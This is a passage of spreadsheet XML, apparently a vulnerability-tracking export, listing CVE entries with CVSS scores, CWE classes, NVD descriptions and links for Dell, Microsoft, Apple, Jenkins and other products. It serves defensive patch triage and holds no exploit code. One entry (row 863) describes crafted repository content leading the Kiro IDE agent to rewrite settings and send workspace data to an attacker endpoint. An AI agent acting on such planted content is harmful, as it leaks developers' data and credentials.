          <t>dell:latitude_3330, dell:latitude_3420, dell:latitude_3440, dell:latitude_3450, dell:latitude_5440, dell:latitude_5450, dell:latitude_5520, dell:latitude_5530, dell:latitude_5540, dell:latitude_5550</t>
        </is>
      </c>
      <c r="L853" s="5" t="inlineStr"/>
      <c r="M853" s="5" t="inlineStr"/>
      <c r="N853" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O853" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P853" s="5" t="inlineStr"/>
      <c r="Q853" s="5" t="inlineStr">
        <is>
          <t>CWE-494</t>
        </is>
      </c>
      <c r="R853" s="5" t="inlineStr">
        <is>
          <t>Dell ThinOS 10, versions prior to 2605_10.2616, contain a Download of Code Without Integrity Check vulnerability. An unauthenticated attacker with physical access could potentially exploit this vulnerability, leading to arbitrary code execution.</t>
        </is>
      </c>
      <c r="S853" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81052</t>
        </is>
      </c>
    </row>
    <row r="854">
      <c r="A854" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B854" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C854" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81326</t>
        </is>
      </c>
      <c r="D854" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E854" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F854" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G854" s="5" t="inlineStr"/>
      <c r="H854" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I854" s="5" t="inlineStr"/>
      <c r="J854" s="5" t="inlineStr"/>
      <c r="K854" s="5" t="inlineStr"/>
      <c r="L854" s="5" t="inlineStr"/>
      <c r="M854" s="5" t="inlineStr"/>
      <c r="N854" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O854" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P854" s="5" t="inlineStr"/>
      <c r="Q854" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="R854" s="5" t="inlineStr">
        <is>
          <t>QND uses a hard-coded cryptographic key, which may allow a local attacker who is logged in to a Windows PC where the affected product's client is installed to obtain administrator credentials, including an ID and password.</t>
        </is>
      </c>
      <c r="S854" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81326</t>
        </is>
      </c>
    </row>
    <row r="855">
      <c r="A855" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B855" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C855" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91100</t>
        </is>
      </c>
      <c r="D855" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E855" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F855" s="5" t="inlineStr">
        <is>
          <t>hp-security-alert@hp.com</t>
        </is>
      </c>
      <c r="G855" s="5" t="inlineStr"/>
      <c r="H855" s="5" t="inlineStr"/>
      <c r="I855" s="5" t="inlineStr"/>
      <c r="J855" s="5" t="inlineStr"/>
      <c r="K855" s="5" t="inlineStr"/>
      <c r="L855" s="5" t="inlineStr"/>
      <c r="M855" s="5" t="inlineStr"/>
      <c r="N855" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O855" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P855" s="5" t="inlineStr"/>
      <c r="Q855" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R855" s="5" t="inlineStr">
        <is>
          <t>HP has identified and remediated multiple externally reported vulnerabilities within HPLIP. The findings affect several software components that could potentially enable remote code execution, privilege escalation, denial of service, information disclosure, or unauthorized file modification under certain conditions.</t>
        </is>
      </c>
      <c r="S855" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91100</t>
        </is>
      </c>
    </row>
    <row r="856">
      <c r="A856" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B856" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C856" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92140</t>
        </is>
      </c>
      <c r="D856" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E856" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F856" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G856" s="5" t="inlineStr"/>
      <c r="H856" s="5" t="inlineStr"/>
      <c r="I856" s="5" t="inlineStr"/>
      <c r="J856" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K856" s="5" t="inlineStr"/>
      <c r="L856" s="5" t="inlineStr"/>
      <c r="M856" s="5" t="inlineStr"/>
      <c r="N856" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O856" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P856" s="5" t="inlineStr"/>
      <c r="Q856" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R856" s="5" t="inlineStr">
        <is>
          <t>Jenkins Gitee Plugin 1301.v8957053c7902 and earlier does not escape the sender name from Gitee push webhook payloads in build causes, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to trigger builds via the Jenkins Gitee Plugin webhook endpoint.</t>
        </is>
      </c>
      <c r="S856" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92140</t>
        </is>
      </c>
    </row>
    <row r="857">
      <c r="A857" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B857" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C857" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92800</t>
        </is>
      </c>
      <c r="D857" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E857" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F857" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G857" s="5" t="inlineStr"/>
      <c r="H857" s="5" t="inlineStr"/>
      <c r="I857" s="5" t="inlineStr"/>
      <c r="J857" s="5" t="inlineStr"/>
      <c r="K857" s="5" t="inlineStr"/>
      <c r="L857" s="5" t="inlineStr"/>
      <c r="M857" s="5" t="inlineStr"/>
      <c r="N857" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O857" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P857" s="5" t="inlineStr"/>
      <c r="Q857" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="R857" s="5" t="inlineStr">
        <is>
          <t>Docs before 5.4.1 fails to properly revoke websocket collaboration connections when access is revoked at parent documents. Attackers with revoked access can retain real-time read and write access to sub-documents through open websocket sessions that are never disconnected.</t>
        </is>
      </c>
      <c r="S857" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92800</t>
        </is>
      </c>
    </row>
    <row r="858">
      <c r="A858" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B858" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C858" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92812</t>
        </is>
      </c>
      <c r="D858" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E858" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F858" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G858" s="5" t="inlineStr"/>
      <c r="H858" s="5" t="inlineStr"/>
      <c r="I858" s="5" t="inlineStr"/>
      <c r="J858" s="5" t="inlineStr"/>
      <c r="K858" s="5" t="inlineStr"/>
      <c r="L858" s="5" t="inlineStr"/>
      <c r="M858" s="5" t="inlineStr"/>
      <c r="N858" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O858" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P858" s="5" t="inlineStr"/>
      <c r="Q858" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R858" s="5" t="inlineStr">
        <is>
          <t>decap-server contains a path traversal vulnerability in the local proxy containment guard that uses plain string prefix comparison without path separator validation. Attackers can access sibling directories whose names begin with the repository directory name to read, write, or delete files outside the intended repository root.</t>
        </is>
      </c>
      <c r="S858" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92812</t>
        </is>
      </c>
    </row>
    <row r="859">
      <c r="A859" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B859" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C859" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-26947</t>
        </is>
      </c>
      <c r="D859" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E859" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F859" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G859" s="5" t="inlineStr"/>
      <c r="H859" s="5" t="inlineStr"/>
      <c r="I859" s="5" t="inlineStr"/>
      <c r="J859" s="5" t="inlineStr"/>
      <c r="K859" s="5" t="inlineStr"/>
      <c r="L859" s="5" t="inlineStr"/>
      <c r="M859" s="5" t="inlineStr"/>
      <c r="N859" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O859" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P859" s="5" t="inlineStr"/>
      <c r="Q859" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R859" s="5" t="inlineStr">
        <is>
          <t>Dell ECS versions 3.8.1.0 through 3.8.1.7, and Dell ObjectScale versions prior to 4.4.0.0, contains an Improper Privilege Management vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to Elevation of privileges.</t>
        </is>
      </c>
      <c r="S859" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-26947</t>
        </is>
      </c>
    </row>
    <row r="860">
      <c r="A860" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B860" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C860" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69820</t>
        </is>
      </c>
      <c r="D860" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E860" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F860" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G860" s="5" t="inlineStr"/>
      <c r="H860" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I860" s="5" t="inlineStr"/>
      <c r="J860" s="5" t="inlineStr"/>
      <c r="K860" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="L860" s="5" t="inlineStr"/>
      <c r="M860" s="5" t="inlineStr"/>
      <c r="N860" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O860" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P860" s="5" t="inlineStr"/>
      <c r="Q860" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R860" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S860" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69820</t>
        </is>
      </c>
    </row>
    <row r="861">
      <c r="A861" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B861" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C861" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70425</t>
        </is>
      </c>
      <c r="D861" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E861" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F861" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G861" s="5" t="inlineStr"/>
      <c r="H861" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I861" s="5" t="inlineStr"/>
      <c r="J861" s="5" t="inlineStr"/>
      <c r="K861" s="5" t="inlineStr">
        <is>
          <t>dell:powerscale_onefs</t>
        </is>
      </c>
      <c r="L861" s="5" t="inlineStr"/>
      <c r="M861" s="5" t="inlineStr"/>
      <c r="N861" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O861" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P861" s="5" t="inlineStr"/>
      <c r="Q861" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R861" s="5" t="inlineStr">
        <is>
          <t>Dell PowerScale OneFS, Versions 9.5.0.0 through 9.7.1.0, Versions 9.8.0.0 through 9.10.1.0, and Versions 9.11.0.0 through 9.14.0.1, contain a command injection vulnerability. An admin privileged local attacker could potentially exploit this vulnerability, leading to elevation of privileges to root, impacting confidentiality, integrity, and availability.</t>
        </is>
      </c>
      <c r="S861" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70425</t>
        </is>
      </c>
    </row>
    <row r="862">
      <c r="A862" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B862" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C862" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81049</t>
        </is>
      </c>
      <c r="D862" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E862" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F862" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G862" s="5" t="inlineStr"/>
      <c r="H862" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I862" s="5" t="inlineStr"/>
      <c r="J862" s="5" t="inlineStr"/>
      <c r="K862" s="5" t="inlineStr">
        <is>
          <t>dell:latitude_3330, dell:latitude_3420, dell:latitude_3440, dell:latitude_3450, dell:latitude_5440, dell:latitude_5450, dell:latitude_5520, dell:latitude_5530, dell:latitude_5540, dell:latitude_5550</t>
        </is>
      </c>
      <c r="L862" s="5" t="inlineStr"/>
      <c r="M862" s="5" t="inlineStr"/>
      <c r="N862" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O862" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P862" s="5" t="inlineStr"/>
      <c r="Q862" s="5" t="inlineStr">
        <is>
          <t>CWE-353</t>
        </is>
      </c>
      <c r="R862" s="5" t="inlineStr">
        <is>
          <t>Dell ThinOS 10, versions prior to 2605_10.2616, contain a Missing Support for Integrity Check vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to arbitrary code execution.</t>
        </is>
      </c>
      <c r="S862" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81049</t>
        </is>
      </c>
    </row>
    <row r="863">
      <c r="A863" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B863" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C863" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89332</t>
        </is>
      </c>
      <c r="D863" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E863" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F863" s="5" t="inlineStr">
        <is>
          <t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t>
        </is>
      </c>
      <c r="G863" s="5" t="inlineStr"/>
      <c r="H863" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I863" s="5" t="inlineStr"/>
      <c r="J863" s="5" t="inlineStr"/>
      <c r="K863" s="5" t="inlineStr">
        <is>
          <t>amazon:kiro_ide</t>
        </is>
      </c>
      <c r="L863" s="5" t="inlineStr"/>
      <c r="M863" s="5" t="inlineStr"/>
      <c r="N863" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O863" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P863" s="5" t="inlineStr"/>
      <c r="Q863" s="5" t="inlineStr">
        <is>
          <t>CWE-201, CWE-829</t>
        </is>
      </c>
      <c r="R863" s="5" t="inlineStr">
        <is>
          <t>Inclusion of functionality from an untrusted control sphere in the Kiro Powers feature in Amazon Kiro IDE before version 0.8.135 might allow remote unauthenticated actors to obtain sensitive information from a developer workstation. Crafted repository content can cause the agent to modify the workspace settings file, which redirects the Kiro Powers registry request to an actor controlled endpoint and sends workspace data to that endpoint when the Powers panel is opened.
To remediate this issue, users should upgrade to Kiro IDE version 0.8.135 or later. Users who opened a project in an earlier version should also rotate any credentials that were present in that project.</t>
        </is>
      </c>
      <c r="S863" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89332</t>
        </is>
      </c>
    </row>
    <row r="864">
      <c r="A864" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B864" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C864" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54177</t>
        </is>
      </c>
      <c r="D864" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="E864" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F864" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G864" s="5" t="inlineStr"/>
      <c r="H864" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I864" s="5" t="inlineStr"/>
      <c r="J864" s="5" t="inlineStr"/>
      <c r="K864" s="5" t="inlineStr"/>
      <c r="L864" s="5" t="inlineStr"/>
      <c r="M864" s="5" t="inlineStr"/>
      <c r="N864" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O864" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P864" s="5" t="inlineStr"/>
      <c r="Q864" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="R864" s="5" t="inlineStr">
        <is>
          <t>backpack/crud provides Create, Read, Update &amp; Delete (CRUD) functions for Backpack, a collection of Laravel packages that help users build custom administration panels. From 6.0.0 until 6.8.14 and 7.0.38, HasUploadFields methods uploadFileToDisk and uploadMultipleFilesToDisk, used through CrudTrait, and the withFiles() path through FileNameGenerator do not internally reject server-executable file types. An authenticated administrator can achieve remote code execution by using an upload-enabled CRUD field without mimes: and mimetypes: validation when the public disk is web-accessible through php artisan storage:link and the web-server and PHP-FPM configuration executes the stored extension. The legacy path preserves an accepted extension and the newer path derives an extension without blocking dangerous types. The package-level restriction is defense in depth and does not replace application-level upload validation. This issue is fixed in versions 6.8.14 and 7.0.38.</t>
        </is>
      </c>
      <c r="S864" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54177</t>
        </is>
      </c>
    </row>
    <row r="865">
      <c r="A865" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B865" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C865" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69469</t>
        </is>
      </c>
      <c r="D865" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="E865" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F865" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G865" s="5" t="inlineStr"/>
      <c r="H865" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I865" s="5" t="inlineStr"/>
      <c r="J865" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K865" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L865" s="5" t="inlineStr"/>
      <c r="M865" s="5" t="inlineStr"/>
      <c r="N865" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O865" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P865" s="5" t="inlineStr"/>
      <c r="Q865" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="R865" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows USB Audio Class driver (usbaudio.sys) allows an unauthorized attacker to elevate privileges with a physical attack.</t>
        </is>
      </c>
      <c r="S865" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69469</t>
        </is>
      </c>
    </row>
    <row r="866">
      <c r="A866" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B866" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C866" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81051</t>
        </is>
      </c>
      <c r="D866" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="E866" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F866" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G866" s="5" t="inlineStr"/>
      <c r="H866" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I866" s="5" t="inlineStr"/>
      <c r="J866" s="5" t="inlineStr"/>
      <c r="K866" s="5" t="inlineStr">
        <is>
          <t>dell:latitude_3330, dell:latitude_3420, dell:latitude_3440, dell:latitude_3450, dell:latitude_5440, dell:latitude_5450, dell:latitude_5520, dell:latitude_5530, dell:latitude_5540, dell:latitude_5550</t>
        </is>
      </c>
      <c r="L866" s="5" t="inlineStr"/>
      <c r="M866" s="5" t="inlineStr"/>
      <c r="N866" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O866" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P866" s="5" t="inlineStr"/>
      <c r="Q866" s="5" t="inlineStr">
        <is>
          <t>CWE-1328</t>
        </is>
      </c>
      <c r="R866" s="5" t="inlineStr">
        <is>
          <t>Dell ThinOS 10, versions prior to 2605_10.2616, contain a Security Version Number Mutable to Older Versions vulnerability. A low privileged attacker with physical access could potentially exploit this vulnerability, leading to Protection mechanism bypass.</t>
        </is>
      </c>
      <c r="S866" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81051</t>
        </is>
      </c>
    </row>
    <row r="867">
      <c r="A867" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B867" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C867" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84537</t>
        </is>
      </c>
      <c r="D867" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="E867" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F867" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G867" s="5" t="inlineStr"/>
      <c r="H867" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I867" s="5" t="inlineStr"/>
      <c r="J867" s="5" t="inlineStr"/>
      <c r="K867" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L867" s="5" t="inlineStr"/>
      <c r="M867" s="5" t="inlineStr"/>
      <c r="N867" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O867" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P867" s="5" t="inlineStr"/>
      <c r="Q867" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="R867" s="5" t="inlineStr">
        <is>
          <t>The issue was addressed with improved memory handling. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. An app may be able to cause unexpected system termination or corrupt kernel memory.</t>
        </is>
      </c>
      <c r="S867" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84537</t>
        </is>
      </c>
    </row>
    <row r="868">
      <c r="A868" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B868" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C868" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92615</t>
        </is>
      </c>
      <c r="D868" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="E868" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F868" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G868" s="5" t="inlineStr"/>
      <c r="H868" s="5" t="inlineStr"/>
      <c r="I868" s="5" t="inlineStr"/>
      <c r="J868" s="5" t="inlineStr"/>
      <c r="K868" s="5" t="inlineStr"/>
      <c r="L868" s="5" t="inlineStr"/>
      <c r="M868" s="5" t="inlineStr"/>
      <c r="N868" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O868" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P868" s="5" t="inlineStr"/>
      <c r="Q868" s="5" t="inlineStr">
        <is>
          <t>CWE-413</t>
        </is>
      </c>
      <c r="R868" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in flightctl. The configureRepoHTTPSClient() function in the device-render worker builds a per-repository tls.Config (which may include InsecureSkipVerify, a custom CA bundle, or tenant-supplied mTLS client certificates) and installs it into go-git's process-global client.Protocols map via gitclient.InstallProtocol("https", ...). Because the worker renders devices for multiple organizations concurrently from a shared goroutine pool, whichever tenant's repository configuration is written last wins for all in-flight git.Clone calls. 
This race condition can cause one tenant's TLS settings, including InsecureSkipVerify or mTLS client credentials, to leak into another tenant's git operations.</t>
        </is>
      </c>
      <c r="S868" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92615</t>
        </is>
      </c>
    </row>
    <row r="869">
      <c r="A869" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B869" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C869" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12759</t>
        </is>
      </c>
      <c r="D869" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E869" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F869" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G869" s="5" t="inlineStr"/>
      <c r="H869" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I869" s="5" t="inlineStr"/>
      <c r="J869" s="5" t="inlineStr"/>
      <c r="K869" s="5" t="inlineStr"/>
      <c r="L869" s="5" t="inlineStr"/>
      <c r="M869" s="5" t="inlineStr"/>
      <c r="N869" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O869" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
